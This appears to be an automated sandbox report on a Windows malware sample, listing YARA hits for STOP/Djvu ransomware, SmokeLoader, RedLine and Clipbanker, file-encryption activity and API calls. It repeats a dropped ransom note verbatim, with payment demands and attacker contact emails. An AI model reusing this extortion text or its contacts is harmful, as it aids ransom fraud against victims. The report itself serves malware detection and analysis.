            Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.6:49712 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.6:49713 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.6:49719 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49721 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49722 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 192.185.16.114:443 -> 192.168.2.6:49723 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49724 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49726 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.253.115.138:443 -> 192.168.2.6:49727 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49729 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49729 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.207.127:443 -> 192.168.2.6:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.6:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.156.20:443 -> 192.168.2.6:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.6:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.105.90.131:443 -> 192.168.2.6:49738 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 78.46.229.36:443 -> 192.168.2.6:49741 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Yara detected SmokeLoader
            Source: Yara matchFile source: 00000006.00000002.2358331788.0000000000C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2358489940.0000000002741000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2120318342.0000000000CC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2120238789.0000000000C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_004822E0 CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetObjectA,BitBlt,GetBitmapBits,SelectObject,DeleteObject,DeleteDC,DeleteDC,DeleteDC,12_2_004822E0

            E-Banking Fraud

            barindex
            Yara detected Glupteba
            Source: Yara matchFile source: 44.3.71C9.exe.39e0000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 29.2.71C9.exe.3190e67.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 44.2.71C9.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 44.2.71C9.exe.30f0e67.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 29.3.71C9.exe.3a80000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 29.2.71C9.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000002C.00000002.4539281116.0000000003533000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000002C.00000003.3174084489.0000000003E22000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000002C.00000002.4516603892.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 71C9.exe PID: 6944, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: 71C9.exe PID: 3208, type: MEMORYSTR

            Spam, unwanted Advertisements and Ransom Demands

            barindex
            Found ransom note / readme
            Source: C:\Users\user\_README.txtDropped file: ATTENTION!Don't worry, you can return all your files!All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.The only method of recovering files is to purchase decrypt tool and unique key for you.This software will decrypt all your encrypted files.What guarantees you have?You can send one of your encrypted file from your PC and we decrypt it for free.But we can decrypt only 1 file for free. File must not contain valuable information.Do not ask assistants from youtube and recovery data sites for help in recovering your data.They can use your free decryption quota and scam you.Our contact is emails in this text document only.You can get and look video overview decrypt tool:https://wetransfer.com/downloads/3ed7a617738550b0a00c5aa231c0752020240316170955/d71ce1Price of private key and decrypt software is $999.Discount 50% available if you contact us first 72 hours, that's price for you is $499.Please note that you'll never restore your data without payment.Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.To get this software you need write on our e-mail:support@freshingmail.topReserve e-mail address to contact us:datarestorehelpyou@airmail.ccYour personal ID:0857PsawqSr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5Jump to dropped file
            Yara detected Babuk Ransomware
            Source: Yara matchFile source: Process Memory Space: DB15.exe PID: 6320, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: DB15.exe PID: 4436, type: MEMORYSTR
            Yara detected Djvu Ransomware
            Source: Yara matchFile source: 11.2.DB15.exe.28715a0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 22.2.DB15.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.DB15.exe.28915a0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.DB15.exe.28715a0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 28.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 28.2.DB15.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.2.DB15.exe.28415a0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.2.DB15.exe.28415a0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.DB15.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.DB15.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.DB15.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.2.DB15.exe.28715a0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.DB15.exe.28915a0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 22.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.DB15.exe.28a15a0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.DB15.exe.28a15a0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.2.DB15.exe.28715a0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000016.00000002.2979075027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.2971579481.00000000028A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.4516721779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.3053638727.0000000002840000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.2843694068.0000000002890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.3061490314.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.2845608400.0000000002870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: DB15.exe PID: 6336, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: DB15.exe PID: 7004, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: DB15.exe PID: 5368, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: DB15.exe PID: 6320, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: DB15.exe PID: 5356, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: DB15.exe PID: 4436, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: DB15.exe PID: 5988, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: DB15.exe PID: 6848, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: DB15.exe PID: 7144, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: DB15.exe PID: 3544, type: MEMORYSTR
            Modifies existing user documents (likely ransomware behavior)
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeFile moved: C:\Users\user\Desktop\SQSJKEBWDT.jpg
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeFile deleted: C:\Users\user\Desktop\SQSJKEBWDT.jpg
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeFile moved: C:\Users\user\Desktop\MXPXCVPDVN.docx
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeFile deleted: C:\Users\user\Desktop\MXPXCVPDVN.docx
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeFile moved: C:\Users\user\Desktop\SFPUSAFIOL\PWCCAWLGRE.pdfJump to behavior
            Writes a notice file (html or txt) to demand a ransom
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeFile dropped: C:\Users\user\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/3ed7a617738550b0a00c5aa231c0752020240316170955/d71ce1price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail addressJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeFile dropped: C:\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/3ed7a617738550b0a00c5aa231c0752020240316170955/d71ce1price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail addressJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeFile dropped: C:\$WinREAgent\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/3ed7a617738550b0a00c5aa231c0752020240316170955/d71ce1price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail addressJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeFile dropped: C:\$WinREAgent\Scratch\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/3ed7a617738550b0a00c5aa231c0752020240316170955/d71ce1price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail addressJump to dropped file

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 43.2.build3.exe.24115a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 43.2.build3.exe.24115a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 11.2.DB15.exe.28715a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 11.2.DB15.exe.28715a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 22.2.DB15.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 22.2.DB15.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 18.2.DB15.exe.28915a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 18.2.DB15.exe.28915a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 11.2.DB15.exe.28715a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 11.2.DB15.exe.28715a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 28.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 28.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 19.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 19.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 28.2.DB15.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 28.2.DB15.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 27.2.DB15.exe.28415a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 27.2.DB15.exe.28415a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 27.2.DB15.exe.28415a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 27.2.DB15.exe.28415a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 12.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 12.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 19.2.DB15.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 19.2.DB15.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 17.2.DB15.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 17.2.DB15.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 17.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 17.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 12.2.DB15.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 12.2.DB15.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 16.2.DB15.exe.28715a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 16.2.DB15.exe.28715a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 18.2.DB15.exe.28915a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 18.2.DB15.exe.28915a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 22.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 22.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 21.2.DB15.exe.28a15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 21.2.DB15.exe.28a15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 43.2.build3.exe.24115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 43.2.build3.exe.24115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 21.2.DB15.exe.28a15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 21.2.DB15.exe.28a15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 16.2.DB15.exe.28715a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 16.2.DB15.exe.28715a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 00000006.00000002.2358331788.0000000000C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: 00000016.00000002.2979075027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 00000016.00000002.2979075027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 00000000.00000002.2120177869.0000000000C20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: 00000006.00000002.2358389618.0000000000CAD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 00000006.00000002.2358489940.0000000002741000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: 00000015.00000002.2971579481.00000000028A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 0000002B.00000002.3313329838.0000000002410000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 0000002B.00000002.3313329838.0000000002410000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 0000002C.00000002.4539281116.00000000030F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: 0000002C.00000002.4532684195.0000000002CF4000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 0000001D.00000002.3185463938.0000000003190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: 0000000B.00000002.2820341095.00000000027D0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000013.00000002.4516721779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 00000013.00000002.4516721779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 0000002B.00000002.3313063118.000000000083D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000015.00000002.2970592193.0000000002708000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000023.00000002.3157028193.0000000000850000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 0000001B.00000002.3053638727.0000000002840000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 0000001B.00000002.3053445351.000000000279C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000012.00000002.2843694068.0000000002890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 0000001C.00000002.3061490314.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 0000001C.00000002.3061490314.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 00000010.00000002.2845608400.0000000002870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 00000006.00000002.2358317151.0000000000C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: 00000000.00000002.2120426554.0000000000D1F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000000.00000002.2120318342.0000000000CC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: 00000012.00000002.2843572828.00000000027F1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000010.00000002.2845428957.00000000027D6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000000.00000002.2120238789.0000000000C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: 0000001D.00000002.3181347032.0000000002D88000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTRMatched rule: Semi-Auto-generated - file ironshell.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
            Source: Process Memory Space: DB15.exe PID: 6336, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: Process Memory Space: DB15.exe PID: 7004, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: Process Memory Space: DB15.exe PID: 5368, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: Process Memory Space: DB15.exe PID: 6320, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: Process Memory Space: DB15.exe PID: 5356, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: Process Memory Space: DB15.exe PID: 4436, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: Process Memory Space: DB15.exe PID: 5988, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: Process Memory Space: DB15.exe PID: 6848, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: Process Memory Space: DB15.exe PID: 7144, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: Process Memory Space: DB15.exe PID: 3544, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            PE file contains section with special chars
            Source: A0B.exe.2.drStatic PE information: section name: .vmp{
            Source: A0B.exe.2.drStatic PE information: section name: .vmp{
            Source: A0B.exe.2.drStatic PE information: section name: .vmp{
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004015D5
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_00401603 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401603
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_0040161A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040161A
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_004026D2 NtOpenKey,0_2_004026D2
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_00402745 NtEnumerateKey,0_2_00402745
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_00402348 NtQuerySystemInformation,NtQuerySystemInformation,0_2_00402348
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040156B
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_00402770 NtEnumerateKey,0_2_00402770
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_0040217B NtQuerySystemInformation,NtQuerySystemInformation,0_2_0040217B
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_0040217D NtQuerySystemInformation,NtQuerySystemInformation,0_2_0040217D
